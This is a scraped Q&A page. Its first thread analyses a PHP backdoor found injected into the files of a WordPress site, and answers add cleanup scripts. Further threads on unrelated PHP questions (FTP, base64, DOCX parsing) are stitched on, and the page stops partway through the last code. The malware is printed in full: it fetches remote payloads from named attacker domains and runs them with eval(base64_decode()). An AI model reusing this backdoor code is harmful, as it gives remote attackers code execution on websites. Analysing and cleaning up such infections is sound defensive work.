What exactly does this PHP exploit code (found on my app)? - php

I've found this code in base 64 on all php files of one of my client's site (wordpress) and I'm trying to understand what it does.
I'm also trying to figure out if it was an application exploit or a direct FTP access that has past this code.
Everything starts with setup_globals_777() and ob_start('mrobh') setting the callback to the mrobh($content) function.
Then there are a call to gzdecodeit ($decode) where the hassle starts out.
It seems like it gets the page content and change it. Now I'm trying to detect the specific changes and understand all functions, including the second one gzdecodeit().
Can someone shed some light on it?
The calls
setup_globals_777();
ob_start('mrobh');
// Here the application code and html output starts out
The callback:
function mrobh ($content)
{
#Header('Content-Encoding: none');
$decoded_content = gzdecodeit($content);
if (preg_match('/\<\/body/si', $decoded_content)) {
return preg_replace('/(\<\/body[^\>]*\>)/si', gml_777() . "\n" . '$1',
$decoded_content);
} else {
return $decoded_content . gml_777();
}
}
The setup function (understandable)
function setup_globals_777 ()
{
$rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
$mz = "/tmp/";
if (! is_dir($rz)) {
#mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
} else {
$rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
if (! is_dir($rz)) {
#mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
}
} else {
$mz = $rz;
}
}
} else {
$mz = $rz;
}
$bot = 0;
$ua = $_SERVER['HTTP_USER_AGENT'];
if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
$bot = 1;
if (stristr($ua, "bingbot") || stristr($ua, "google"))
$bot = 1;
$msie = 0;
if (is_msie_777($ua))
$msie = 1;
$mac = 0;
if (is_mac_777($ua))
$mac = 1;
if (($msie == 0) && ($mac == 0))
$bot = 1;
global $_SERVER;
$_SERVER['s_p1'] = $mz;
$_SERVER['s_b1'] = $bot;
$_SERVER['s_t1'] = 1200;
$_SERVER['s_d1'] = "http://sweepstakesandcontestsdo.com/";
$d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" .
urlencode($_SERVER["PHP_SELF"]) . "&a=" .
urlencode($_SERVER["HTTP_USER_AGENT"]);
$_SERVER['s_a1'] = 'http://www.lilypophilypop.com/g_load.php' . $d;
$_SERVER['s_a2'] = 'http://www.lolypopholypop.com/g_load.php' . $d;
$_SERVER['s_script'] = "mm.php?d=1";
}
The first function called after the callback execution:
Here is where the magic happens. I can't see the calls for the other
available functions and understand what this function is actually
decoding, since the $decode var is the application output grabbed by
the ob_start()
function gzdecodeit ($decode)
{
$t = #ord(#substr($decode, 3, 1));
$start = 10;
$v = 0;
if ($t & 4) {
$str = #unpack('v', substr($decode, 10, 2));
$str = $str[1];
$start += 2 + $str;
}
if ($t & 8) {
$start = #strpos($decode, chr(0), $start) + 1;
}
if ($t & 16) {
$start = #strpos($decode, chr(0), $start) + 1;
}
if ($t & 2) {
$start += 2;
}
$ret = #gzinflate(#substr($decode, $start));
if ($ret === FALSE) {
$ret = $decode;
}
return $ret;
}
All the available functions (after a base64_decode()):
<?php
if (function_exists('ob_start') && ! isset($_SERVER['mr_no'])) {
$_SERVER['mr_no'] = 1;
if (! function_exists('mrobh')) {
function get_tds_777 ($url)
{
$content = "";
$content = #trycurl_777($url);
if ($content !== false)
return $content;
$content = #tryfile_777($url);
if ($content !== false)
return $content;
$content = #tryfopen_777($url);
if ($content !== false)
return $content;
$content = #tryfsockopen_777($url);
if ($content !== false)
return $content;
$content = #trysocket_777($url);
if ($content !== false)
return $content;
return '';
}
function trycurl_777 ($url)
{
if (function_exists('curl_init') === false)
return false;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_HEADER, 0);
$result = curl_exec($ch);
curl_close($ch);
if ($result == "")
return false;
return $result;
}
function tryfile_777 ($url)
{
if (function_exists('file') === false)
return false;
$inc = #file($url);
$buf = #implode('', $inc);
if ($buf == "")
return false;
return $buf;
}
function tryfopen_777 ($url)
{
if (function_exists('fopen') === false)
return false;
$buf = '';
$f = #fopen($url, 'r');
if ($f) {
while (! feof($f)) {
$buf .= fread($f, 10000);
}
fclose($f);
} else
return false;
if ($buf == "")
return false;
return $buf;
}
function tryfsockopen_777 ($url)
{
if (function_exists('fsockopen') === false)
return false;
$p = #parse_url($url);
$host = $p['host'];
$uri = $p['path'] . '?' . $p['query'];
$f = #fsockopen($host, 80, $errno, $errstr, 30);
if (! $f)
return false;
$request = "GET $uri HTTP/1.0\n";
$request .= "Host: $host\n\n";
fwrite($f, $request);
$buf = '';
while (! feof($f)) {
$buf .= fread($f, 10000);
}
fclose($f);
if ($buf == "")
return false;
list ($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10),
$buf);
return $buf;
}
function trysocket_777 ($url)
{
if (function_exists('socket_create') === false)
return false;
$p = #parse_url($url);
$host = $p['host'];
$uri = $p['path'] . '?' . $p['query'];
$ip1 = #gethostbyname($host);
$ip2 = #long2ip(#ip2long($ip1));
if ($ip1 != $ip2)
return false;
$sock = #socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (! #socket_connect($sock, $ip1, 80)) {
#socket_close($sock);
return false;
}
$request = "GET $uri HTTP/1.0\n";
$request .= "Host: $host\n\n";
socket_write($sock, $request);
$buf = '';
while ($t = socket_read($sock, 10000)) {
$buf .= $t;
}
#socket_close($sock);
if ($buf == "")
return false;
list ($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10),
$buf);
return $buf;
}
function update_tds_file_777 ($tdsfile)
{
$actual1 = $_SERVER['s_a1'];
$actual2 = $_SERVER['s_a2'];
$val = get_tds_777($actual1);
if ($val == "")
$val = get_tds_777($actual2);
$f = #fopen($tdsfile, "w");
if ($f) {
#fwrite($f, $val);
#fclose($f);
}
if (strstr($val, "|||CODE|||")) {
list ($val, $code) = explode("|||CODE|||", $val);
eval(base64_decode($code));
}
return $val;
}
function get_actual_tds_777 ()
{
$defaultdomain = $_SERVER['s_d1'];
$dir = $_SERVER['s_p1'];
$tdsfile = $dir . "log1.txt";
if (#file_exists($tdsfile)) {
$mtime = #filemtime($tdsfile);
$ctime = time() - $mtime;
if ($ctime > $_SERVER['s_t1']) {
$content = update_tds_file_777($tdsfile);
} else {
$content = #file_get_contents($tdsfile);
}
} else {
$content = update_tds_file_777($tdsfile);
}
$tds = #explode("\n", $content);
$c = #count($tds) + 0;
$url = $defaultdomain;
if ($c > 1) {
$url = trim($tds[mt_rand(0, $c - 2)]);
}
return $url;
}
function is_mac_777 ($ua)
{
$mac = 0;
if (stristr($ua, "mac") || stristr($ua, "safari"))
if ((! stristr($ua, "windows")) && (! stristr($ua, "iphone")))
$mac = 1;
return $mac;
}
function is_msie_777 ($ua)
{
$msie = 0;
if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") ||
stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9"))
$msie = 1;
return $msie;
}
function setup_globals_777 ()
{
$rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
$mz = "/tmp/";
if (! is_dir($rz)) {
#mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
} else {
$rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
if (! is_dir($rz)) {
#mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
}
} else {
$mz = $rz;
}
}
} else {
$mz = $rz;
}
$bot = 0;
$ua = $_SERVER['HTTP_USER_AGENT'];
if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
$bot = 1;
if (stristr($ua, "bingbot") || stristr($ua, "google"))
$bot = 1;
$msie = 0;
if (is_msie_777($ua))
$msie = 1;
$mac = 0;
if (is_mac_777($ua))
$mac = 1;
if (($msie == 0) && ($mac == 0))
$bot = 1;
global $_SERVER;
$_SERVER['s_p1'] = $mz;
$_SERVER['s_b1'] = $bot;
$_SERVER['s_t1'] = 1200;
$_SERVER['s_d1'] = "http://sweepstakesandcontestsdo.com/";
$d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" .
urlencode($_SERVER["PHP_SELF"]) . "&a=" .
urlencode($_SERVER["HTTP_USER_AGENT"]);
$_SERVER['s_a1'] = 'http://www.lilypophilypop.com/g_load.php' . $d;
$_SERVER['s_a2'] = 'http://www.lolypopholypop.com/g_load.php' . $d;
$_SERVER['s_script'] = "mm.php?d=1";
}
if (! function_exists('gml_777')) {
function gml_777 ()
{
$r_string_777 = '';
if ($_SERVER['s_b1'] == 0)
$r_string_777 = '';
return $r_string_777;
}
}
if (! function_exists('gzdecodeit')) {
function gzdecodeit ($decode)
{
$t = #ord(#substr($decode, 3, 1));
$start = 10;
$v = 0;
if ($t & 4) {
$str = #unpack('v', substr($decode, 10, 2));
$str = $str[1];
$start += 2 + $str;
}
if ($t & 8) {
$start = #strpos($decode, chr(0), $start) + 1;
}
if ($t & 16) {
$start = #strpos($decode, chr(0), $start) + 1;
}
if ($t & 2) {
$start += 2;
}
$ret = #gzinflate(#substr($decode, $start));
if ($ret === FALSE) {
$ret = $decode;
}
return $ret;
}
}
function mrobh ($content)
{
#Header('Content-Encoding: none');
$decoded_content = gzdecodeit($content);
if (preg_match('/\<\/body/si', $decoded_content)) {
return preg_replace('/(\<\/body[^\>]*\>)/si',
gml_777() . "\n" . '$1', $decoded_content);
} else {
return $decoded_content . gml_777();
}
}
}
}

Looks like it creates a hidden .log folder:
$rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
$mz = "/tmp/";
if (! is_dir($rz)) {
#mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
} else {
$rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
if (! is_dir($rz)) {
#mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
}
} else {
$mz = $rz;
}
}
} else {
$mz = $rz;
}
Then seems to download code from http://www.lolypopholypop.com/g_load.php and http://sweepstakesandcontestsdo.com/, base64 decodes it, then executes it:
function update_tds_file_777 ($tdsfile)
{
$actual1 = $_SERVER['s_a1'];
$actual2 = $_SERVER['s_a2'];
$val = get_tds_777($actual1);
if ($val == "")
$val = get_tds_777($actual2);
$f = #fopen($tdsfile, "w");
if ($f) {
#fwrite($f, $val);
#fclose($f);
}
if (strstr($val, "|||CODE|||")) {
list ($val, $code) = explode("|||CODE|||", $val);
eval(base64_decode($code));
}
return $val;
}
So without having to access your server again, they can execute different code.

Dan Hill wrote an article about getting base64 hacked for WordPress installations.
To quote the results of Dan's findings:
The hack I found essentially created a new php file in the uploads folder of Wordpress that allowed remote filesystem control, and then modified the pages being served (every .php file) to include a script tag redirecting visitors to some dodgy sites.
To get rid of the problem, Dan tried the following:
I did this in three stages. First, find any world-writable directories (tsk tsk):
find . -type d -perm -o=w
And make them not world writable:
find . -type d -perm -o=w -print -exec chmod 770 {} \;
Delete all the new files these guys created:
find . -wholename '*wp-content/uploads/*.php' -exec rm -rf {} \;
(In wordpress, the uploads folder shouldn’t contain any PHP)
Stage two, repair all your infected PHP files. I played around using sed and xargs for this, but eventually gave up and wrote a quick ruby script to do the job. Run this run this ruby script from your root directory:
#!/usr/bin/env ruby
Dir.glob('**/*.php').each do|f|
puts f
begin
contents = File.read(f)
contents = contents.gsub(/\<\?php \/\*\*\/ eval\(.*\)\);\?\>/, "")
File.open(f, 'w') {|f| f.write(contents) }
rescue
puts "FILE ERROR"
end
end
The final step is to upgrade all your old, forgotten about Wordpress installs to prevent any other vulnerabilities showing up. The bonus step for good luck is to reset your passwords, especially any MySQL passwords stored in plain text in your wp-config.php file.
Hope Dan's findings help!

For those searching for a non-Ruby fix, here's a PHP version of Dan Hill's code:
<?php
function fileExtension($filename) {
$pathInfo = pathinfo($filename);
return strtolower($pathInfo['extension']);
}
function fixFiles($path) {
$path = str_replace('././', './', $path);
$d = #opendir($path);
if ($d) {
while (($entry = readdir($d)) !== false) {
$baseEntry = $entry;
$entry = str_replace('././', './', $path . '/' . $entry);
if ($baseEntry != '.' && $baseEntry != '..') {
if (is_file($entry)) {
$fe = fileExtension($entry);
if ($fe == 'php') {
$contents = file_get_contents($entry);
$contents = preg_replace("/\<\?php \/\*\*\/ eval\(.*\)\);\?\>/", '', $contents);
$f = fopen($entry, 'w');
fputs($f, $contents);
fclose($f);
echo $entry . '<br>';
flush();
}
}
else if (is_dir($entry)) {
fixFiles($path . '/' . basename($entry));
}
}
}
closedir($d);
}
}
fixFiles('.');
?>

Related

copy a php file to every directory

I've a simple problem of copying a a php folder to some directories, bu the problem is I can't the solution for that, the idea is that I've an Online Manga Viewer script, and what I want to do is I want to add comments page to every chapter, the I dea that I came with, is, I create a separate comments page file and once a new chapter added the the comments file will be copied to the folder of the chapter :
Description Image:
http://i.stack.imgur.com/4wYE0.png
What I to know is how can I do it knowing that I will use Disqus commenting System.
Functions used in the script:
function omv_get_mangas() {
$mangas = array();
$dirname = "mangas/";
$dir = #opendir($dirname);
if ($dir) {
while (($file = #readdir($dir)) !== false) {
if (is_dir($dirname . $file . '/') && ($file != ".") && ($file != "..")) {
$mangas[] = $file;
}
}
#closedir($dir);
}
sort($mangas);
return $mangas;
}
function omv_get_chapters($manga) {
global $omv_chapters_sorting;
$chapters = array();
$chapters_id = array();
$dirname = "mangas/$manga/";
$dir = #opendir($dirname);
if ($dir) {
while (($file = #readdir($dir)) !== false) {
if (is_dir($dirname . $file . '/') && ($file != ".") && ($file != "..")) {
$chapter = array();
$chapter["folder"] = $file;
$pos = strpos($file, '-');
if ($pos === false) {
$chapter["number"] = $file;
} else {
$chapter["number"] = trim(substr($file, 0, $pos - 1));
$chapter["title"] = trim(substr($file, $pos + 1));
}
$chapters_id[] = $chapter["number"];
$chapters[] = $chapter;
}
}
#closedir($dir);
}
array_multisort($chapters_id, $omv_chapters_sorting, $chapters);
return $chapters;
}
function omv_get_chapter_index($chapters, $chapter_number) {
$i = 0;
while (($i < count($chapters)) && ($chapters[$i]["number"] != $chapter_number)) $i++;
return ($i < count($chapters)) ? $i : -1;
}
function omv_get_pages($manga, $chapter) {
global $omv_img_types;
$pages = array();
$dirname = "mangas/$manga/$chapter/";
$dir = #opendir($dirname);
if ($dir) {
while (($file = #readdir($dir)) !== false) {
if (!is_dir($dirname . $file . '/')) {
$file_extension = strtolower(substr($file, strrpos($file, ".") + 1));
if (in_array($file_extension, $omv_img_types)) {
$pages[] = $file;
}
}
}
#closedir($dir);
}
sort($pages);
return $pages;
}
/*function add_chapter_comment($dirname){
$filename = $dirname.'comments.php';
if (file_exists($filename)) {
} else {
copy('comments.php', .$dirname.'comments.php');
}
}*/
function omv_get_previous_page($manga_e, $chapter_number_e, $current_page, $previous_chapter) {
if ($current_page > 1) {
return $manga_e . '/' . $chapter_number_e . '/' . ($current_page - 1);
} else if ($previous_chapter) {
$pages = omv_get_pages(omv_decode($manga_e), $previous_chapter["folder"]);
return $manga_e . '/' . omv_encode($previous_chapter["number"]) . '/' . count($pages);
} else {
return null;
}
}
function omv_get_next_page($manga_e, $chapter_number_e, $current_page, $nb_pages, $next_chapter) {
if ($current_page < $nb_pages) {
return $manga_e . '/' . $chapter_number_e . '/' . ($current_page + 1);
} else if ($next_chapter) {
return $manga_e . '/' . omv_encode($next_chapter["number"]);
} else {
return null;
}
}
function omv_get_image_size($img) {
global $omv_img_resize, $omv_preferred_width;
$size = array();
$imginfo = getimagesize($img);
$size["width"] = intval($imginfo[0]);
$size["height"] = intval($imginfo[1]);
if ($omv_img_resize) {
if ($size["width"] > $omv_preferred_width) {
$size["height"] = intval($size["height"] * ($omv_preferred_width / $size["width"]));
$size["width"] = $omv_preferred_width;
}
}
return $size;
}
And thanks for all of you!
Include the following line in all of your pages in a small php statement, if it covers two folder paths, use this. Which I think in your case it does.
<?php
include('../../header.php');
?>
And then save this in the main root directory. Which in your diagram is called "Main Folder"

Why base64_encode() return null

I have a 22M docx file and want to encode it using base64_encode() function in php. But It always returns NULL value after running this function. Is there any limit file size or condition for this function. My code:
$handle = fopen($fullpathfile, "rb");
$imagestr = base64_encode(fread($handle, filesize($fullpathfile)));
fclose($handle);
Try this code
$fh = fopen($fullpathfile, 'rb');
$cache = '';
$eof = false;
while (1) {
if (!$eof) {
if (!feof($fh)) {
$row = fgets($fh, 4096);
} else {
$row = '';
$eof = true;
}
}
if ($cache !== '')
$row = $cache.$row;
elseif ($eof)
break;
$b64 = base64_encode($row);
$put = '';
if (strlen($b64) < 76) {
if ($eof) {
$put = $b64."\n";
$cache = '';
} else {
$cache = $row;
}
} elseif (strlen($b64) > 76) {
do {
$put .= substr($b64, 0, 76)."\n";
$b64 = substr($b64, 76);
} while (strlen($b64) > 76);
$cache = base64_decode($b64);
} else {
if (!$eof && $b64{75} == '=') {
$cache = $row;
} else {
$put = $b64."\n";
$cache = '';
}
}
if ($put !== '') {
echo $put;
}
}
fclose($fh);

FTP_DELETE not working?

Hey guys I have my script here that is supposed to do some stuff then delete a file, unfortunetly my files never unlink. I"m wondering what the reason for this might be? Permissions was the only thing I could think of, or maybe the output buffer is messing up? I really don't know, but would appreciate some advice on how to handle it. Issue in question is that last IF() block.
public function remoteFtp() {
$enabled = Mage::getStoreConfig('cataloginventory/settings/use_ftp');
$remove = Mage::getStoreConfig('cataloginventory/settings/ftp_remove_file');
if ($enabled == 0) {
return true;
}
$base_path = Mage::getBaseDir('base');
$ftp_url = Mage::getStoreConfig('cataloginventory/settings/ftp_url');
$ftp_user = Mage::getStoreConfig('cataloginventory/settings/ftp_user');
$ftp_pass = Mage::getStoreConfig('cataloginventory/settings/ftp_password');
$ftp_remote_dir = Mage::getStoreConfig('cataloginventory/settings/ftp_remote_dir');
$ftp_filename_filter = Mage::getStoreConfig('cataloginventory/settings/ftp_remote_filename');
$ftp_file = $base_path . '/edi/working/working.edi';
$handle = fopen($ftp_file, 'w');
$conn_id = ftp_connect($ftp_url);
ftp_login($conn_id, $ftp_user, $ftp_pass) or die("unable to login");
if ($ftp_remote_dir) {
ftp_chdir($conn_id, $ftp_remote_dir);
}
//is there a file
$remote_list = ftp_nlist($conn_id, ".");
$exists = count($remote_list);
if ($exists > 0) {
$len = strlen($ftp_filename_filter) - 1;
foreach ($remote_list as $name) {
if (substr($ftp_filename_filter, 0, 1) == "*") {
if (substr($name, '-' . $len) == substr($ftp_filename_filter, '-' . $len)) {
$ftp_remote_name = $name;
}
}
if (substr($ftp_filename_filter, strlen($name) - 1) == "*") {
if (substr($ftp_filename_filter, 0, $len) == substr($name, 0, $len)) {
$ftp_remote_name = $name;
}
}
if ($ftp_filename_filter == $name) {
$ftp_remote_name = $name;
}
}
}
if (ftp_fget($conn_id, $handle, $ftp_remote_name, FTP_ASCII, 0)) {
echo "successfully written to $ftp_file <br />";
if ($remove == 1) {
ftp_delete($conn_id, $ftp_remote_name);
}
} else {
echo "There was a problem while downloading $ftp_remote_name to $ftp_file <br />";
}
ftp_close($conn_id);
}
The answer was that the system variable $remove = Mage::getStoreConfig('cataloginventory/settings/ftp_remove_file'); was set to BOOL(false)

PHP DOCX convert to HTML [duplicate]

I want to be able to upload an MS word document and export it a page in my site.
Is there any way to accomplish this?
//FUNCTION :: read a docx file and return the string
function readDocx($filePath) {
// Create new ZIP archive
$zip = new ZipArchive;
$dataFile = 'word/document.xml';
// Open received archive file
if (true === $zip->open($filePath)) {
// If done, search for the data file in the archive
if (($index = $zip->locateName($dataFile)) !== false) {
// If found, read it to the string
$data = $zip->getFromIndex($index);
// Close archive file
$zip->close();
// Load XML from a string
// Skip errors and warnings
$xml = DOMDocument::loadXML($data, LIBXML_NOENT | LIBXML_XINCLUDE | LIBXML_NOERROR | LIBXML_NOWARNING);
// Return data without XML formatting tags
$contents = explode('\n',strip_tags($xml->saveXML()));
$text = '';
foreach($contents as $i=>$content) {
$text .= $contents[$i];
}
return $text;
}
$zip->close();
}
// In case of failure return empty string
return "";
}
ZipArchive and DOMDocument are both inside PHP so you don't need to install/include/require additional libraries.
One may use PHPDocX.
It has support for practically all HTML CSS styles. Moreover you may use templates to add extra formatting to your HTML via the replaceTemplateVariableByHTML.
The HTML methods of PHPDocX also allow for the direct use of Word styles. You may use something like this:
$docx->embedHTML($myHTML, array('tableStyle' => 'MediumGrid3-accent5PHPDOCX'));
If you want that all your tables use the MediumGrid3-accent5 Word style. The embedHTML method as well as its version for templates (replaceTemplateVariableByHTML) preserve inheritance, meaning by that that you may use a predefined Word style and override with CSS any of its properties.
You may also extract selected parts of your HTML using 'JQuery type' selectors.
You can convert Word docx documents to html using Print2flash library. Here is an PHP excerpt from my client's site which converts a document to html:
include("const.php");
$p2fServ = new COM("Print2Flash4.Server2");
$p2fServ->DefaultProfile->DocumentType=HTML5;
$p2fServ->ConvertFile($wordfile,$htmlFile);
It converts a document which path is specified in $wordfile variable to a html page file specified by $htmlFile variable. All formatting, hyperlinks and charts are retained. You can get the required const.php file altogether with a fuller sample from Print2flash SDK.
this is a workaround based on David Lin's answer above
removing "w:" in a docx's xml tags leave behing Html like tags
function readDocx($filePath) {
// Create new ZIP archive
$zip = new ZipArchive;
$dataFile = 'word/document.xml';
// Open received archive file
if (true === $zip->open($filePath)) {
// If done, search for the data file in the archive
if (($index = $zip->locateName($dataFile)) !== false) {
// If found, read it to the string
$data = $zip->getFromIndex($index);
// Close archive file
$zip->close();
// Load XML from a string
// Skip errors and warnings
$xml = new DOMDocument("1.0", "utf-8");
$xml->loadXML($data, LIBXML_NOENT | LIBXML_XINCLUDE | LIBXML_NOERROR | LIBXML_NOWARNING|LIBXML_PARSEHUGE);
$xml->encoding = "utf-8";
// Return data without XML formatting tags
$output = $xml->saveXML();
$output = str_replace("w:","",$output);
return $output;
}
$zip->close();
}
// In case of failure return empty string
return "";
}
Ok Im in very late, but thought I'd post this to save you all some time.
This is some php code I have put together not just to read the text from docx but the images too, currently it does not support floating images / text, but what I have done so far is a massive move forwards to whats already been posted on here - note you need to update https://example.co.uk to YOUR domain name.
<?php
class Docx_ws_imglnk {
public $originalpath = '';
public $extractedpath = '';
}
class Docx_ws_rel {
public $Id = '';
public $Target = '';
}
class Docx_ws_def {
public $styleId = '';
public $type = '';
public $color = '000000';
}
class Docx_p_def {
public $data = array();
public $text = "";
}
class Docx_p_item {
public $name = "";
public $value = "";
public $innerstyle = "";
public $type = "text";
}
class Docx_reader {
private $fileData = false;
private $errors = array();
public $rels = array();
public $imglnks = array();
public $styles = array();
public $document = null;
public $paragraphs = array();
public $path = '';
private $saveimgpath = 'docimages';
public function __construct() {
}
private function load($file) {
if (file_exists($file)) {
$zip = new ZipArchive();
$openedZip = $zip->open($file);
if ($openedZip === true) {
$this->path = $file;
//read and save images
for ( $i = 0; $i < $zip->numFiles; $i ++ ) {
$zip_element = $zip->statIndex( $i );
if ( preg_match( "([^\s]+(\.(?i)(jpg|jpeg|png|gif|bmp))$)", $zip_element['name'] ) ) {
$imglnk = new Docx_ws_imglnk;
$imglnk->originalpath = $zip_element['name'];
$imagename = explode( '/', $zip_element['name'] );
$imagename = end( $imagename );
$imglnk->extractedpath = dirname( __FILE__ ) . '/' . $this->savepath . $imagename;
$putres = file_put_contents( $imglnk->extractedpath, $zip->getFromIndex( $i ));
$imglnk->extractedpath = str_replace('var/www/', 'https://example.co.uk/', $imglnk->extractedpath);
$imglnk->extractedpath = substr($imglnk->extractedpath, 1);
array_push($this->imglnks, $imglnk);
}
}
//read relationships
if (($styleIndex = $zip->locateName('word/_rels/document.xml.rels')) !== false) {
$stylesRels = $zip->getFromIndex($styleIndex);
$xml = simplexml_load_string($stylesRels);
$XMLTEXT = $xml->saveXML();
$doc = new DOMDocument();
$doc->loadXML($XMLTEXT);
foreach($doc->documentElement->childNodes as $childnode)
{
$nodename = $childnode->nodeName;
if($childnode->hasAttributes())
{
$rel = new Docx_ws_rel;
for ($a = 0; $a < $childnode->attributes->count(); $a++)
{
$attrNode = $childnode->attributes->item($a);
if (strcmp( $attrNode->nodeName, 'Id') == 0)
{
$rel->Id = $attrNode->nodeValue;
}
if (strcmp( $attrNode->nodeName, 'Target') == 0)
{
$rel->Target = $attrNode->nodeValue;
}
}
array_push($this->rels, $rel);
}
}
}
//attempt to load styles:
if (($styleIndex = $zip->locateName('word/styles.xml')) !== false) {
$stylesXml = $zip->getFromIndex($styleIndex);
$xml = simplexml_load_string($stylesXml);
$XMLTEXT = $xml->saveXML();
$doc = new DOMDocument();
$doc->loadXML($XMLTEXT);
foreach($doc->documentElement->childNodes as $childnode)
{
$nodename = $childnode->nodeName;
//get style
if (strcmp($nodename, "w:style") == 0)
{
$ws_def = new Docx_ws_def;
for ($a=0; $a < $childnode->attributes->count(); $a++ )
{
$item = $childnode->attributes->item($a);
//style id
if (strcmp($item->nodeName, "w:styleId") == 0)
{
$ws_def->styleId = $item->nodeValue;
}
//style type
if (strcmp($item->nodeName, "w:type") == 0)
{
$ws_def->type = $item->nodeValue;
}
}
}
//push style to the array of styles
if (strcmp($ws_def->styleId, "") != 0 && strcmp($ws_def->type, "") != 0)
{
array_push($this->styles, $ws_def);
}
}
}
if (($index = $zip->locateName('word/document.xml')) !== false) {
$stylesDoc = $zip->getFromIndex($index);
$xml = simplexml_load_string($stylesDoc);
$XMLTEXT = $xml->saveXML();
$this->document = new DOMDocument();
$this->document->loadXML($XMLTEXT);
}
$zip->close();
} else {
switch($openedZip) {
case ZipArchive::ER_EXISTS:
$this->errors[] = 'File exists.';
break;
case ZipArchive::ER_INCONS:
$this->errors[] = 'Inconsistent zip file.';
break;
case ZipArchive::ER_MEMORY:
$this->errors[] = 'Malloc failure.';
break;
case ZipArchive::ER_NOENT:
$this->errors[] = 'No such file.';
break;
case ZipArchive::ER_NOZIP:
$this->errors[] = 'File is not a zip archive.';
break;
case ZipArchive::ER_OPEN:
$this->errors[] = 'Could not open file.';
break;
case ZipArchive::ER_READ:
$this->errors[] = 'Read error.';
break;
case ZipArchive::ER_SEEK:
$this->errors[] = 'Seek error.';
break;
}
}
} else {
$this->errors[] = 'File does not exist.';
}
}
public function setFile($path) {
$this->fileData = $this->load($path);
}
public function to_plain_text() {
if ($this->fileData) {
return strip_tags($this->fileData);
} else {
return false;
}
}
public function processDocument() {
$html = '';
foreach($this->document->documentElement->childNodes as $childnode)
{
$nodename = $childnode->nodeName;
//get the body of the document
if (strcmp($nodename, "w:body") == 0)
{
foreach($childnode->childNodes as $subchildnode)
{
$pnodename = $subchildnode->nodeName;
//process every paragraph
if (strcmp($pnodename, "w:p") == 0)
{
$pdef = new Docx_p_def;
foreach($subchildnode->childNodes as $pchildnode)
{
//process any inner children
if (strcmp($pchildnode, "w:pPr") == 0)
{
foreach($pchildnode->childNodes as $prchildnode)
{
//process text alignment
if (strcmp($prchildnode->nodeName, "w:pStyle") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'styleId';
$pitem->value = $prchildnode->attributes->getNamedItem('val')->nodeValue;
array_push($pdef->data, $pitem);
}
//process text alignment
if (strcmp($prchildnode->nodeName, "w:jc") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'align';
$pitem->value = $prchildnode->attributes->getNamedItem('val')->nodeValue;
if (strcmp($pitem->value, "left") == 0)
{
$pitem->innerstyle .= "text-align:" . $pitem->value . ";";
}
if (strcmp($pitem->value, "center") == 0)
{
$pitem->innerstyle .= "text-align:" . $pitem->value . ";";
}
if (strcmp($pitem->value, "right") == 0)
{
$pitem->innerstyle .= "text-align:" . $pitem->value . ";";
}
if (strcmp($pitem->value, "both") == 0)
{
$pitem->innerstyle .= "word-spacing:" . 10 . "px;";
}
array_push($pdef->data, $pitem);
}
//process drawing
if (strcmp($prchildnode->nodeName, "w:drawing") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'drawing';
$pitem->value = '';
$pitem->type = 'graphic';
$extents = $prchildnode->getElementsByTagName('extent')[0];
$cx = $extents->attributes->getNamedItem('cx')->nodeValue;
$cy = $extents->attributes->getNamedItem('cy')->nodeValue;
$pcx = (int)$cx / 9525;
$pcy = (int)$cy / 9525;
$pitem->innerstyle .= "width:" . $pcx . "px;";
$pitem->innerstyle .= "height:" . $pcy . "px;";
$blip = $prchildnode->getElementsByTagName('blip')[0];
$pitem->value = $blip->attributes->getNamedItem('embed')->nodeValue;
array_push($pdef->data, $pitem);
}
//process spacing
if (strcmp($prchildnode->nodeName, "w:spacing") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'paragraphSpacing';
$bval = $prchildnode->attributes->getNamedItem('before')->nodeValue;
if (strcmp($bval, '') == 0)
$bval = 0;
$pitem->innerstyle .= "padding-top:" . $bval . "px;";
$aval = $prchildnode->attributes->getNamedItem('after')->nodeValue;
if (strcmp($aval, '') == 0)
$aval = 0;
$pitem->innerstyle .= "padding-bottom:" . $aval . "px;";
array_push($pdef->data, $pitem);
}
}
}
if (strcmp($pchildnode, "w:r") == 0)
{
foreach($pchildnode->childNodes as $rchildnode)
{
//process text
if (strcmp($rchildnode->nodeName, "w:t") == 0)
{
$pdef->text .= $rchildnode->nodeValue;
if (count($pdef->data) == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'styleId';
$pitem->value = '';
array_push($pdef->data, $pitem);
}
}
if (strcmp($rchildnode->nodeName, "w:rPr") == 0)
{
foreach($rchildnode->childNodes as $rPrchildnode)
{
if (strcmp($rPrchildnode->nodeName, "w:b") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textBold';
$pitem->value = '';
$pitem->innerstyle .= "text-weight: 500;";
array_push($pdef->data, $pitem);
}
if (strcmp($rPrchildnode->nodeName, "w:i") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textItalic';
$pitem->value = '';
$pitem->innerstyle .= "text-style: italic;";
array_push($pdef->data, $pitem);
}
if (strcmp($rPrchildnode->nodeName, "w:u") == 0 )
{
$pitem = new Docx_p_item;
